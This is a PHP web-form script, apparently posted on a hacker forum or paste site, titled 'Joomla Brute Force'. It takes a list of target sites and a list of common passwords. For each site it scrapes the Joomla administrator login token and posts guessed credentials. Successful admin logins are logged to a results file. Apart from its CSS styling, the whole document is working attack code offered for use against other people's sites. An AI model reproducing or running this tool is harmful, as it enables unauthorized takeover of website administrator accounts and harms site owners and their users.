#@!~ Joomla Brute Force

1. <?
2. echo '<html>
3. <head>
4.     <link href="http://66.197.194.181/~amartine/dz-attacker.co.cc/favicon.ico" type="image/x-icon" rel="shortcut icon" />
5.     <meta name="author" content="Th3 K!LL3r Dz" />
6.    <meta name="keywords" content="website, Relizane, hackers ,relizane hacker" />
7.    <meta name="description" content="Th3 K!LL3r Dz fr0m Relizane !n aLGeria" />
8. <title># Joomla~Brute~Force #</title>
9. <style type=\'text/css\'>
10. input[type=submit], input[type=button], input[type=reset]{
11.     text-align:center;
12.     background:url(http://i43.tinypic.com/5owgmq.jpg) repeat-x center bottom #666666;
13.     border:1px solid #4D4D4D;
14.     color:#FFFFFF;
15.     border-top-color:#565656;
16.     padding:4px 6px;
17.     margin:4px 5px;
18.     height:16px;
19.     -moz-box-shadow:0 0 1px black;
20.     -webkit-box-shadow:0 0 1px black;
21.     box-shadow:0 0 1px black;
22.     text-shadow:0 1px black;
23.     -moz-border-radius:4px;
24.     -webkit-border-radius:4px;
25.     -khtml-border-radius:4px;
26.     border-radius:4px;
27.     height:23px;
28. }
29.  
30.  
31. input[type=text], input[type=password]{
32.     background:urlhttp://i43.tinypic.com/5owgmq.jpg) repeat-x center bottom #666666;
33.     border:1px solid #4D4D4D;
34.     color:#CCCCCC;
35.     border-top-color:#565656;
36.     -moz-box-shadow:0 0 1px black;
37.     -webkit-box-shadow:0 0 1px black;
38.     box-shadow:0 0 1px black;
39.     -moz-border-radius:4px;
40.     -webkit-border-radius:4px;
41.     -khtml-border-radius:4px;
42.     border-radius:4px;
43.     height:18px;
44.     margin-left: 5px;
45. }
46. input , textarea , button , body , caption , table ,area , option {
47.    outline:none;
48.    transition: all 0.20s ease-in-out;
49.    -webkit-transition: all 0.25s ease-in-out;
50.    -moz-transition: all 0.25s ease-in-out;
51.    border-radius:3px;
52.    -webkit-border-radius:3px;
53.    -moz-border-radius:3px;
54.    //border:1px solid rgba(0,0,0, 0.2);
55. /*   font-family: \'Gill Sans\', \'Gill Sans MT\', Calibri, \'Trebuchet MS\', sans-serif; */
56. }
57. input , textarea {
58.    background: url(\'http://i41.tinypic.com/ibkmd5.png\') repeat scroll 0 0 #8B8B8B;\';
59. }
60.  
61.  
62.  
63.  
64. body{
65. /*  font-family : Verdana; */
66.     color : #FFFFFF;
67.     font-size : 14px;
68.     font-family:tahoma;
69.     background: url(http://i44.tinypic.com/i56tc9.jpg) no-repeat center top #252525;
70. }
71. input , textarea {
72.    outline:none;
73.    transition: all 0.20s ease-in-out;
74.    -webkit-transition: all 0.25s ease-in-out;
75.    -moz-transition: all 0.25s ease-in-out;
76.    border-radius:3px;
77.    -webkit-border-radius:3px;
78.    -moz-border-radius:3px;
79.    border:1px solid rgba(0,0,0, 0.2);
80. }
81. input:focus, textarea:focus {
82.  outline: 0;
83.  border-color: rgba(82, 168, 236, 0.8);
84.  -webkit-box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.1), 0 0 8px rgba(82, 168, 236, 0.6);
85.  -moz-box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.1), 0 0 8px rgba(82, 168, 236, 0.6);
86.  box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.1), 0 0 8px rgba(82, 168, 236, 0.6);
87.  
88.  
89.    background: url(\'http://i41.tinypic.com/ibkmd5.png\') repeat scroll 0 0 #8B8B8B;\';
90.    overflow: auto;
91.  
92. }
93. .x1 {}
94. .x2 {font-size:13px;
95. background-color:green;
96. color:black;}
97. hr {color:white;}
98. a {color:black;}
99. #x5 {
100.     font-family:tahoma;}
101. .d1 {color :#C17E0B;
102. font-family:tahoma;
103. font-size:13px;
104. font-weight:bold;}
105. #d4 {color:#C17E0B;
106. font-family:tahoma;
107. font-weight:bold;}
108.  </style>
109.  </head>
110. </br></br>
111. <center><b><font > Joomla~Brute~Force </font></b><br /><br /><br />
112. <form method="post" action="" enctype="multipart/form-data">
113. <table width="50%" border="0">
114. <tr><td><p ><font class="d1">User :</font>
115. <input type="text" name="usr" value=\'admin\' size="15"> </font><br /><br /></p>
116. </td></tr>
117. <tr><td><font class="d1">Sites list :</font>
118. </td><td><font class="d1" >Pass list :</font></td></tr>
119. <tr>
120.         <td>
121. <textarea name="sites" cols="40" rows="13" ></textarea>
122. </td><td>
123. <textarea name="w0rds" cols="20" rows="13" >
124. admin
125. 123456
126. password
127. 102030
128. 123123
129. 12345
130. 123456789
131. pass
132. test
133. admin123
134. demo
135. </textarea>
136. </td></tr><tr><td>
137. <font >
138. <input type="submit" name="x" value="start" id="d4">
139. </font></td></tr></table>
140. </form></center>';
141. @set_time_limit(0);
142. # joomla brute Force
143. # Coded by Lagrip-dz
144. # Devloped by Lagrip-dz
145. # Style Leacked By Th3 K!LL3r Dz
146.  
147. if($_POST['x']){
148.  
149. echo "<hr>";
150.  
151. $sites = explode("\n",$_POST["sites"]); // Get Sites By Th3 K!LL3r Dz !
152. $w0rds = explode("\n",$_POST["w0rds"]); // Get w0rdLiSt By Th3 K!LL3r Dz !
153.  
154. $Attack = new Joomla_brute_Force(); // Active Class
155.  
156.  
157. foreach($w0rds as $pwd){
158.  
159. foreach($sites as $site){
160.  
161.  
162. $Attack->check_it(txt_cln($site),$_POST['usr'],txt_cln($pwd)); // Brute :D
163. flush();flush();
164.  
165. }
166.  
167. }
168.  
169. }
170.  
171.  
172. # Class & Function'z
173.  
174. function txt_cln($value){  return str_replace(array("\n","\r"),"",$value); }
175.  
176. class Joomla_brute_Force{
177.  
178. public function check_it($site,$user,$pass){ // print result
179.  
180. if(eregi('com_config',$this->post($site,$user,$pass))){
181.  
182. echo "<span class=\"x2\"><b># Success : $user:$pass -> <a href='$site/administrator/index.php'>$site/administrator/index.php</a></b></span><BR>";
183. $f = fopen("Result.txt","a+"); fwrite($f , "Success ~~ $user:$pass -> $site/administrator/index.php\n"); fclose($f);
184. flush();
185. }else{ echo "# Failed : $user:$pass -> $site<BR>"; flush();}
186.  
187. }
188.  
189. public function post($site,$user,$pass){ // Post -> user & pass
190.  
191. $token = $this->extract_token($site);
192.  
193. $curl=curl_init();
194.  
195. curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
196. curl_setopt($curl,CURLOPT_URL,$site."/administrator/index.php");
197. @curl_setopt($curl,CURLOPT_COOKIEFILE,'cookie.txt');
198. @curl_setopt($curl,CURLOPT_COOKIEJAR,'cookie.txt');
199. curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317  Firefox/3.0.4');
200. @curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
201. curl_setopt($curl,CURLOPT_POST,1);
202. curl_setopt($curl,CURLOPT_POSTFIELDS,'username='.$user.'&passwd='.$pass.'&lang=en-GB&option=com_login&task=login&'.$token.'=1');
203. curl_setopt($curl,CURLOPT_TIMEOUT,20);
204.  
205. $exec=curl_exec($curl);
206. curl_close($curl);
207. return $exec;
208.  
209. }
210.  
211. public function extract_token($site){ // get token from source for -> function post
212.  
213. $source = $this->get_source($site);
214.  
215. preg_match_all("/type=\"hidden\" name=\"([0-9a-f]{32})\" value=\"1\"/si" ,$source,$token);
216.  
217. return $token[1][0];
218.  
219. }
220.  
221. public function get_source($site){ // get source for -> function extract_token
222.  
223. $curl=curl_init();
224. curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
225. curl_setopt($curl,CURLOPT_URL,$site."/administrator/index.php");
226. @curl_setopt($curl,CURLOPT_COOKIEFILE,'cookie.txt');
227. @curl_setopt($curl,CURLOPT_COOKIEJAR,'cookie.txt');
228. curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317  Firefox/3.0.4');
229. @curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
230. curl_setopt($curl,CURLOPT_TIMEOUT,20);
231.  
232. $exec=curl_exec($curl);
233. curl_close($curl);
234. return $exec;
235.  
236. }
237.  
238. }
239. ?>